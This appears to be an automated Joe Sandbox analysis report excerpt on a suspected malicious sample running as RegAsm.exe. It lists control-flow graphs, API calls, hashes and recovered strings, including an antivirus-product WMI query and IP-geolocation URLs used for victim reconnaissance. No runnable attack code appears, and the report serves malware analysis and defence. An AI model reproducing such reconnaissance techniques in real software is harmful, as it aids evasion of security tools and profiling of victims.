                                                                                                                                                                                                                                            • Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
                                                                                                                                                                                                                                            • Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$CloseExclusiveHandleLockSleep$AcquireBinaryCreateProcessReleaseType$ConditionExecuteShellVariableWake
                                                                                                                                                                                                                                          • String ID: !jwj$$$($)$.$6|tt$B$B$D$D$E$E$J$K$M$M$M$P$eks$j3l6lrek$mOA$v
                                                                                                                                                                                                                                          • API String ID: 469071346-4142521700
                                                                                                                                                                                                                                          • Opcode ID: 10c079741a010cbc27c3b25f10ff34d316d84ab10b3ce49be593139cf8c96b2c
                                                                                                                                                                                                                                          • Instruction ID: 25b4dd716968d004817c252c2393c646fb2409f2773173bf43e65d163309b470
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10c079741a010cbc27c3b25f10ff34d316d84ab10b3ce49be593139cf8c96b2c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1B4335709042688FDB25CB64CC94BEEBBB1BF49304F0481EAD54967381DB386E89CF59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: *NK^K$-NN$/$/F_$4]D$@$B&#6#$Content-Type: application/x-www-form-urlencoded$I-(=($S72'2$S=2>6$e`u`$https://ipgeolocation.io/$https://ipinfo.io/$k$k$k$kn{n$lcog$p$r$|$|
                                                                                                                                                                                                                                          • API String ID: 0-3284807517
                                                                                                                                                                                                                                          • Opcode ID: a4eb933c22132a099d76f77a8de656241115a02af968f15d5d81f47461b8aa5b
                                                                                                                                                                                                                                          • Instruction ID: c7d5bd5d44397f905c05e8a6ae4fdd4f8a32e3fdcd9d0a3d97fe4df541a22c15
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4eb933c22132a099d76f77a8de656241115a02af968f15d5d81f47461b8aa5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04830370D052A88FDB25CB28CC94BEEBBB1AF89304F0481DAD54967242CB796F85CF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: %$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:::
                                                                                                                                                                                                                                          • API String ID: 3732870572-4246453620
                                                                                                                                                                                                                                          • Opcode ID: c18fa04924d531576c8b28d82549ab37b7a6970473c17938a2ee201c938c722a
                                                                                                                                                                                                                                          • Instruction ID: f115d8c10725fef486f73ebf3abac10adfbb27f38f5e9dcadf0ac8c245414fd8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c18fa04924d531576c8b28d82549ab37b7a6970473c17938a2ee201c938c722a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 474338709042688BCB25DF25CC91BEEBBB5AF45309F0441DED54AAB242DB346F88CF59

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2177 430740-43076d call 41b910 2180 430770-430780 2177->2180 2180->2180 2181 430782-4308cd call 41a1e0 call 5672b0 call 567190 call 414fd0 2180->2181 2190 430904-43090c call 41bb40 2181->2190 2191 4308cf-4308d6 2181->2191 2195 430911-430918 2190->2195 2193 4308e1 2191->2193 2194 4308d8-4308df 2191->2194 2196 4308e8-4308ee 2193->2196 2194->2196 2197 430923 2195->2197 2198 43091a-430921 2195->2198 2196->2190 2199 4308f0-430902 call 414e70 2196->2199 2200 43092a-430930 2197->2200 2198->2200 2199->2195 2203 430932-43094c call 4ef210 2200->2203 2204 43098a-4309b1 call 417140 2200->2204 2210 430952-430962 2203->2210 2209 4309bc-4309c0 2204->2209 2211 4309c2-4309f7 2209->2211 2212 4309f9-430a48 call 414d00 call 54f78c 2209->2212 2210->2210 2213 430964-430985 call 4172e0 2210->2213 2211->2209 2220 430a4e-430c3f call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 55012d 2212->2220 2221 43120c-431223 call 417140 * 2 2212->2221 2213->2204 2244 430c44-430cf7 call 5672b0 * 3 call 567190 call 41fbd0 2220->2244 2230 4317d6-4317dc 2221->2230 2255 430d07-430d2a call 54f8c8 call 417140 * 2 2244->2255 2256 430cf9-430d05 2244->2256 2255->2230 2256->2255 2257 430d2f-430fcb call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 54fc1b 2256->2257 2296 430fdb-430fe7 call 41bba0 2257->2296 2297 430fcd-430fd9 call 41bb40 2257->2297 2301 430fec-43114e call 5672b0 call 567190 call 414d00 call 55012d 2296->2301 2297->2301 2310 431150-431164 call 53f1aa 2301->2310 2311 43118a-4311a2 2301->2311 2310->2311 2320 431166-431187 call 41f450 call 53f0da call 53f159 2310->2320 2312 4311f4-4311f9 call 4ee6c0 2311->2312 2313 4311a4-4311f2 call 4fb3b0 call 4f57c0 2311->2313 2319 4311fe-4313fc call 54f8c8 call 414e10 call 5672b0 * 2 call 41fb00 call 414e10 call 4ef310 call 5672b0 * 3 call 567190 call 41fbd0 call 5672b0 * 2 call 41fb00 2312->2319 2313->2319 2361 431402-431413 call 414d50 2319->2361 2362 431560-4315bf call 5672b0 * 2 call 41fb00 2319->2362 2320->2311 2367 431415-431424 call 414d50 2361->2367 2368 431429-43143b call 414d50 2361->2368 2381 4315ca-4315d0 2362->2381 2377 43155b 2367->2377 2378 431451-431463 call 414d50 2368->2378 2379 43143d-43144c call 414d50 2368->2379 2377->2362 2387 431465-431474 call 414d50 2378->2387 2388 431479-43148b call 414d50 2378->2388 2379->2377 2384 4315d6-431685 call 5672b0 * 3 call 567190 call 41fbd0 call 414d50 2381->2384 2385 43168a-4316af call 414d00 CreateFileA 2381->2385 2384->2381 2396 4316b1-4316df call 414d00 WriteFile CloseHandle 2385->2396 2397 4316e5-4316f9 2385->2397 2387->2377 2403 4314a1-4314b3 call 414d50 2388->2403 2404 43148d-43149c call 414d50 2388->2404 2396->2397 2401 431735-43174d 2397->2401 2402 4316fb-43170f call 53f1aa 2397->2402 2406 4317b5-4317ba call 4ee6c0 2401->2406 2407 43174f-4317b3 call 4f57c0 2401->2407 2402->2401 2421 431711-431732 call 41f450 call 53f0da call 53f159 2402->2421 2423 4314b5-4314c4 call 414d50 2403->2423 2424 4314c9-4314db call 414d50 2403->2424 2404->2377 2420 4317bf-4317d3 call 417140 * 2 2406->2420 2407->2420 2420->2230 2421->2401 2423->2377 2435 4314ee-431500 call 414d50 2424->2435 2436 4314dd-4314ec call 414d50 2424->2436 2451 431513-431525 call 414d50 2435->2451 2452 431502-431511 call 414d50 2435->2452 2436->2377 2457 431527-431536 call 414d50 2451->2457 2458 431538-43154a call 414d50 2451->2458 2452->2377 2457->2377 2458->2377 2463 43154c-431558 call 414d50 2458->2463 2463->2377
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0043088A
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00430B99
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • __fread_nolock.LIBCMT ref: 00430C3F
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00430CAB
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00430DE5
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00430F1A
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 004310DA
                                                                                                                                                                                                                                          • __fread_nolock.LIBCMT ref: 00431131
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                          • String ID: eks$j3l6lrek$u
                                                                                                                                                                                                                                          • API String ID: 3493607940-2906203254
                                                                                                                                                                                                                                          • Opcode ID: 4b25fa690cb6031b03eea203296c0b7868b516ef5e5c922917b617c779054669
                                                                                                                                                                                                                                          • Instruction ID: ed82bb78abdf7bbcf2c54842750a728aaef47426149999f07c8a46fe1ccb441f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b25fa690cb6031b03eea203296c0b7868b516ef5e5c922917b617c779054669
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13B2C0B1E002189FDB24DB64CC91BEEBBB5BF89304F0481A9E509A7391DB346E85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2466 4317e0-43180d call 41b910 2469 431810-431820 2466->2469 2469->2469 2470 431822-43196d call 41a1e0 call 5672b0 call 567190 call 414fd0 2469->2470 2479 4319a4-4319ac call 41bb40 2470->2479 2480 43196f-431976 2470->2480 2484 4319b1-4319b8 2479->2484 2482 431981 2480->2482 2483 431978-43197f 2480->2483 2485 431988-43198e 2482->2485 2483->2485 2487 4319c3 2484->2487 2488 4319ba-4319c1 2484->2488 2485->2479 2486 431990-4319a2 call 414e70 2485->2486 2486->2484 2490 4319ca-4319d0 2487->2490 2488->2490 2492 4319d2-4319ec call 4ef210 2490->2492 2493 431a2a-431a51 call 417140 2490->2493 2499 4319f2-431a02 2492->2499 2498 431a5c-431a60 2493->2498 2500 431a62-431a97 2498->2500 2501 431a99-431ae8 call 414d00 call 54f78c 2498->2501 2499->2499 2502 431a04-431a25 call 4172e0 2499->2502 2500->2498 2509 431aee-431cdf call 5672b0 * 2 call 41fb00 call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 55012d 2501->2509 2510 4322ac-4322c3 call 417140 * 2 2501->2510 2502->2493 2533 431ce4-431d97 call 5672b0 * 3 call 567190 call 41fbd0 2509->2533 2519 432870-432876 2510->2519 2544 431da7-431dca call 54f8c8 call 417140 * 2 2533->2544 2545 431d99-431da5 2533->2545 2544->2519 2545->2544 2546 431dcf-43206b call 5672b0 * 2 call 41fb00 call 5672b0 * 3 call 567190 call 41fbd0 call 54fc1b call 54f66e call 5672b0 call 567190 call 5672b0 * 2 call 41fb00 call 54fc1b 2545->2546 2585 43207b-432087 call 41bba0 2546->2585 2586 43206d-432079 call 41bb40 2546->2586 2590 43208c-4321ee call 5672b0 call 567190 call 414d00 call 55012d 2585->2590 2586->2590 2599 4321f0-432204 call 53f1aa 2590->2599 2600 43222a-432242 2590->2600 2599->2600 2608 432206-432227 call 41f450 call 53f0da call 53f159 2599->2608 2601 432294-432299 call 4ee6c0 2600->2601 2602 432244-432292 call 4fb3b0 call 4f57c0 2600->2602 2607 43229e-43249c call 54f8c8 call 414e10 call 5672b0 * 2 call 41fb00 call 414e10 call 4ef310 call 5672b0 * 3 call 567190 call 41fbd0 call 5672b0 * 2 call 41fb00 2601->2607 2602->2607 2650 4324a2-4324b3 call 414d50 2607->2650 2651 432600-43265f call 5672b0 * 2 call 41fb00 2607->2651 2608->2600 2657 4324b5-4324c4 call 414d50 2650->2657 2658 4324c9-4324db call 414d50 2650->2658 2671 43266a-432670 2651->2671 2666 4325fb 2657->2666 2667 4324f1-432503 call 414d50 2658->2667 2668 4324dd-4324ec call 414d50 2658->2668 2666->2651 2676 432505-432514 call 414d50 2667->2676 2677 432519-43252b call 414d50 2667->2677 2668->2666 2674 432676-43271f call 5672b0 * 3 call 567190 call 41fbd0 call 414d50 2671->2674 2675 432724-432749 call 414d00 CreateFileA 2671->2675 2674->2671 2685 43274b-432779 call 414d00 WriteFile CloseHandle 2675->2685 2686 43277f-432793 2675->2686 2676->2666 2692 432541-432553 call 414d50 2677->2692 2693 43252d-43253c call 414d50 2677->2693 2685->2686 2690 432795-4327a9 call 53f1aa 2686->2690 2691 4327cf-4327e7 2686->2691 2690->2691 2712 4327ab-4327cc call 41f450 call 53f0da call 53f159 2690->2712 2695 4327e9-43284d call 4f57c0 2691->2695 2696 43284f-432854 call 4ee6c0 2691->2696 2708 432555-432564 call 414d50 2692->2708 2709 432569-43257b call 414d50 2692->2709 2693->2666 2711 432859-43286d call 417140 * 2 2695->2711 2696->2711 2708->2666 2726 43258e-4325a0 call 414d50 2709->2726 2727 43257d-43258c call 414d50 2709->2727 2711->2519 2712->2691 2740 4325b3-4325c5 call 414d50 2726->2740 2741 4325a2-4325b1 call 414d50 2726->2741 2727->2666 2746 4325c7-4325d6 call 414d50 2740->2746 2747 4325d8-4325ea call 414d50 2740->2747 2741->2666 2746->2666 2747->2666 2752 4325ec-4325f8 call 414d50 2747->2752 2752->2666
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0043192A
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00431C39
                                                                                                                                                                                                                                            • Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82
                                                                                                                                                                                                                                          • __fread_nolock.LIBCMT ref: 00431CDF
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00431D4B
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
                                                                                                                                                                                                                                            • Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00431E85
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 00431FBA
                                                                                                                                                                                                                                          • __aulldiv.LIBCMT ref: 0043217A
                                                                                                                                                                                                                                          • __fread_nolock.LIBCMT ref: 004321D1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv$__fread_nolock
                                                                                                                                                                                                                                          • String ID: (ZJ$eks$j3l6lrek
                                                                                                                                                                                                                                          • API String ID: 3493607940-3988229910
                                                                                                                                                                                                                                          • Opcode ID: d83ad16072a8572a1aaf4ca098f82bfb11dcfed48d10112301351ecbd305db73
                                                                                                                                                                                                                                          • Instruction ID: 3febfb47fdc92599cddc4016dfe3e7c600fe40ff91a5eff04d31f94f3ff2dda5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d83ad16072a8572a1aaf4ca098f82bfb11dcfed48d10112301351ecbd305db73
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87B2D0B1E002189FDB24DB64CC91BEEBBB5BF89304F1481A9E409A7391DB346E85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 2755 433600-43361a CoInitializeEx 2756 433621-433640 CoInitializeSecurity 2755->2756 2757 43361c 2755->2757 2759 433642-433648 CoUninitialize 2756->2759 2760 43364d-433673 CoCreateInstance 2756->2760 2758 4338d6-4338d9 2757->2758 2759->2758 2761 433675-433679 2760->2761 2762 43367b-433681 CoUninitialize 2760->2762 2761->2762 2763 433686-4336ae call 41f8a0 2761->2763 2762->2758 2766 4336b0-4336ba 2763->2766 2767 4336bc 2763->2767 2768 4336c3-4336eb 2766->2768 2767->2768 2770 4336ed-4336f5 call 41f930 2768->2770 2771 4336fc-433700 2768->2771 2770->2771 2773 433702-433706 2771->2773 2774 433708-43370e CoUninitialize 2771->2774 2773->2774 2776 433713-43373b call 41f830 2773->2776 2774->2758 2779 433749 2776->2779 2780 43373d-433747 2776->2780 2781 433750-43376c call 41f830 2779->2781 2780->2781 2784 43377a 2781->2784 2785 43376e-433778 2781->2785 2786 433781-4337a5 2784->2786 2785->2786 2788 4337a7-4337af call 41f930 2786->2788 2789 4337b6-4337ba 2786->2789 2788->2789 2790 4337cb-4337cf 2789->2790 2791 4337bc-4337c4 call 41f930 2789->2791 2794 4337d1-4337d5 2790->2794 2795 4337d7-4337dd CoUninitialize 2790->2795 2791->2790 2794->2795 2798 4337e2-4337e9 2794->2798 2795->2758 2799 4338d0 CoUninitialize 2798->2799 2800 4337ef-433822 2798->2800 2799->2758 2802 433824-433828 2800->2802 2803 43382a 2800->2803 2802->2803 2804 43382f-433857 2802->2804 2803->2799 2806 433859-4338b7 call 541c00 call 41f490 call 414fd0 call 4f5470 call 417140 VariantClear 2804->2806 2807 4338bd-4338cb 2804->2807 2806->2807 2807->2798
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000002), ref: 0043360D
                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00433633
                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 00433642
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Initialize$SecurityUninitialize
                                                                                                                                                                                                                                          • String ID: %ws$ROOT\SecurityCenter2$Select * From AntiVirusProduct$WQL$displayName
                                                                                                                                                                                                                                          • API String ID: 3757020523-4229669714
                                                                                                                                                                                                                                          • Opcode ID: c67cd6453a7068374fb33b74f0bf6fb915a2f14b00f39174ba8a3a221c5ae9b0
                                                                                                                                                                                                                                          • Instruction ID: 248eaa1abccf262ec5addea588efc0091001d51c6a96fc74f562b6610ee92897
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67cd6453a7068374fb33b74f0bf6fb915a2f14b00f39174ba8a3a221c5ae9b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08A1F7B4E00209EFDB14DF94C985BEEBBB5BB48305F20815AE5126B390D7B86A45CF54
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: L85<)$b$eks$j3l6lrek$m$ongjr$q$w$~mxl
                                                                                                                                                                                                                                          • API String ID: 3732870572-2218426398
                                                                                                                                                                                                                                          • Opcode ID: 38ea8c7e54da7cde22b4eebf26d39e595f7d253b2e1e825eb53e309b292cf5b7
                                                                                                                                                                                                                                          • Instruction ID: 38a92d830e6c4dd0b9ec2749629d1db253707dd2fe5655ce0909aa02115304b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38ea8c7e54da7cde22b4eebf26d39e595f7d253b2e1e825eb53e309b292cf5b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 77E26770D042689BDB24DB64CC95BEEBBB5BF49304F0481EAE509A7381DB382E85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 3259 509bd0-509bfa call 50ac10 3262 509c05-509c09 3259->3262 3263 509c4a-509c92 call 50aba0 3262->3263 3264 509c0b-509c48 3262->3264 3268 509c9d-509ca1 3263->3268 3264->3262 3269 509ce2-509d4c GetModuleHandleA call 5094a0 call 50ad00 3268->3269 3270 509ca3-509ce0 3268->3270 3276 509d57-509d5b 3269->3276 3270->3268 3277 509d9c-509de4 call 50ac90 3276->3277 3278 509d5d-509d9a 3276->3278 3282 509def-509df3 3277->3282 3278->3276 3283 509e34-509e9e GetModuleHandleA call 5094a0 call 50ae20 3282->3283 3284 509df5-509e32 3282->3284 3290 509ea9-509ead 3283->3290 3284->3282 3291 509eee-509f36 call 50adb0 3290->3291 3292 509eaf-509eec 3290->3292 3296 509f41-509f45 3291->3296 3292->3290 3297 509f86-509ff0 GetModuleHandleA call 5094a0 call 50af00 3296->3297 3298 509f47-509f84 3296->3298 3304 509ffb-509fff 3297->3304 3298->3296 3305 50a040-50a088 call 50ae90 3304->3305 3306 50a001-50a03e 3304->3306 3310 50a093-50a097 3305->3310 3306->3304 3311 50a0d8-50a142 GetModuleHandleA call 5094a0 call 50b010 3310->3311 3312 50a099-50a0d6 3310->3312 3318 50a14d-50a151 3311->3318 3312->3310 3319 50a192-50a1da call 50afa0 3318->3319 3320 50a153-50a190 3318->3320 3324 50a1e5-50a1e9 3319->3324 3320->3318 3325 50a22a-50a297 GetModuleHandleA call 5094a0 call 50b150 3324->3325 3326 50a1eb-50a228 3324->3326 3332 50a2a2-50a2a6 3325->3332 3326->3324 3333 50a2f0-50a344 call 50b0e0 3332->3333 3334 50a2a8-50a2ee 3332->3334 3338 50a355-50a35c 3333->3338 3334->3332 3339 50a3ac-50a422 GetModuleHandleA call 5094a0 call 50b260 3338->3339 3340 50a35e-50a3aa 3338->3340 3346 50a433-50a43a 3339->3346 3340->3338 3347 50a48a-50a4de call 50b1f0 3346->3347 3348 50a43c-50a488 3346->3348 3352 50a4ef-50a4f6 3347->3352 3348->3346 3353 50a546-50a5bc GetModuleHandleA call 5094a0 call 50b390 3352->3353 3354 50a4f8-50a544 3352->3354 3360 50a5cd-50a5d4 3353->3360 3354->3352 3361 50a624-50a678 call 50b320 3360->3361 3362 50a5d6-50a622 3360->3362 3366 50a689-50a690 3361->3366 3362->3360 3367 50a6e0-50a756 GetModuleHandleA call 5094a0 call 50b490 3366->3367 3368 50a692-50a6de 3366->3368 3374 50a767-50a76e 3367->3374 3368->3366 3375 50a770-50a7bc 3374->3375 3376 50a7be-50a812 call 50b420 3374->3376 3375->3374 3380 50a823-50a82a 3376->3380 3381 50a87a-50a8f0 GetModuleHandleA call 5094a0 call 50b530 3380->3381 3382 50a82c-50a878 3380->3382 3388 50a901-50a908 3381->3388 3382->3380 3389 50a958-50a9ac call 50afa0 3388->3389 3390 50a90a-50a956 3388->3390 3394 50a9bd-50a9c4 3389->3394 3390->3388 3395 50aa14-50aaa3 GetModuleHandleA call 5094a0 call 41b910 call 417560 call 509930 3394->3395 3396 50a9c6-50aa12 3394->3396 3406 50ab56-50ab8e call 417140 * 3 call 4f22b0 3395->3406 3407 50aaa9-50aaba call 509990 3395->3407 3396->3394 3407->3406 3412 50aac0-50aae9 call 4150c0 * 2 call 50b5d0 3407->3412 3412->3406 3425 50aaeb-50ab3a call 4ee930 * 2 call 4eee70 call 509a00 3412->3425 3425->3406 3434 50ab3c-50ab51 call 509af0 3425->3434 3434->3406
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509D07
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509E59
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 00509FAB
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A0FD
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A24F
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A3D7
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A571
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A70B
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050A8A5
                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,?), ref: 0050AA3F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                                                                                                          • String ID: EC
                                                                                                                                                                                                                                          • API String ID: 4139908857-2263498742
                                                                                                                                                                                                                                          • Opcode ID: c31d122a47de0a7ce904d1a05562a0db0ea2011487b3a357d3c6ea7ff7baa32b
                                                                                                                                                                                                                                          • Instruction ID: 4cfcad33a6ec3e9e5b8220c0090680f0983b62376599e87d6b0b2d17304a9462
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c31d122a47de0a7ce904d1a05562a0db0ea2011487b3a357d3c6ea7ff7baa32b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22B20270D052688FDB25CF68CC90BEEBBB1BF8A308F1481D9D449AB346D6316A84DF55
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __aulldiv
                                                                                                                                                                                                                                          • String ID: %$&$'$)$3
                                                                                                                                                                                                                                          • API String ID: 3732870572-1175896778
                                                                                                                                                                                                                                          • Opcode ID: c2560ca5fedcbbdada6e6cb124eaba24fe4088e8ac62934dc41647b90016c1e9
                                                                                                                                                                                                                                          • Instruction ID: d693b51815b6c67d81b492c7bdbd45a3678860fb9b1bd3b496e743534c1d8fd4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2560ca5fedcbbdada6e6cb124eaba24fe4088e8ac62934dc41647b90016c1e9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C83EF70D052688FCB65CB28CC90BEEBBB1BF89308F0481DAD54DA7252DA356E85CF55

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
